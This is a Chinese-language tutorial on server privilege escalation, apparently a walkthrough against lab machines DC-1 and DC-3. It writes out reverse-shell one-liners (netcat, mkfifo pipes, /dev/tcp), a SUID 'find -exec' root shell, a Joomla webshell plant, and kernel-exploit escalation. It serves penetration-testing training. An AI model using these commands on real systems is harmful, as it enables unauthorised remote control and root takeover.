服务器提权( 二 )


MSSQL 提权
需要提供sa ?户密码 。 

服务器提权

文章插图
 
MySQL 提权
需要知道root ?户密码 。MySQL udf 提权MySQL mof 提权
服务器提权

文章插图
 

服务器提权

文章插图
 

服务器提权

文章插图
 
反弹Shell
由于WebShell (正向Shell)是基于HTTP 的,不是持久性链接 。
可以通过反弹Shell 的?法获得持久性连接(基于TCP 协议的),?便与对?进?通信 。
反弹shell ,让对?主动来连接“我” 。
windows 平台
windows 平台需要借助 nc.exe ?具 。
# 本地监听 2333 端?nc.exe -lnvp 2333ncat -lnvp 2333# 服务器端反弹Shellnc.exe -e cmd.exe 192.168.10.10 2333ms15-051.exe "nc.exe -e cmd.exe 192.168.16.104 2333" 
服务器提权

文章插图
 

服务器提权

文章插图
 
反弹成功:
服务器提权

文章插图
 
提权:
服务器提权

文章插图
 
linux平台
在获得?标系统WebShell 的情况下
# 本地监听2333 端?ncat -lnvp 2333# 服务端反弹shellnc -e /bin/bash 192.168.16.100 2333不需要-e参数的情况:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.100 2333>/tmp/frm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.16.100 2333>/tmp/f/bin/sh -i >& /dev/tcp/192.168.16.100/2333 0>&1Linux 提权
SUID 提权
?标环境:DC1
服务器提权

文章插图
 
SUID 的概念:具有SUID 标识的命令,在执?期间拥有所有者权限 。
特点:简单、快速 。
进?交互式Shell
Python --versionpython -c 'import pty;pty.spawn("/bin/bash")'系统中具有SUID 标识的命令都有哪些
find / -perm -4000 2>/dev/nullwww-data@DC-1:/var/www$ ls -alh /usr/bin/findls -alh /usr/bin/find-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/findwww-data@DC-1:/var/www$# find 命令在执?期间具有root 权限?find 命令调?bash
find /tmp/ajest -exec "/bin/bash" ;find /tmp/ajest -exec "/bin/sh" ;其他可以提权(调?Shell)命令
vimgitnmap...注意:先前文章已有详细介绍,这里不再赘述!
操作系统漏洞提权
?标环境:DC3
服务器提权

文章插图
 

服务器提权

文章插图
 

服务器提权

文章插图
 

服务器提权

文章插图
 
searchsploit joomla 3.7.0
服务器提权

文章插图
 
getShell:
写入一句话木马,通过蚁剑连接:
# 如果以管理员身份登录joomla ,就可以编辑后台脚本(php)?件 。# 修改?站后台脚本?件的位置Extensions|Templates|Templates|Beez3 Details and Fileshttp://192.168.16.109/templates/beez3/html/config.php 
服务器提权

文章插图
 

服务器提权

文章插图
 
普通权限,提权:
上传提权脚本
服务器提权

文章插图
 
.sh:检查系统中存在哪些可以利用的提权漏洞
服务器提权

文章插图
 

服务器提权

文章插图
 
提权成功:
服务器提权

文章插图
 
获取DC3的flag:
服务器提权


推荐阅读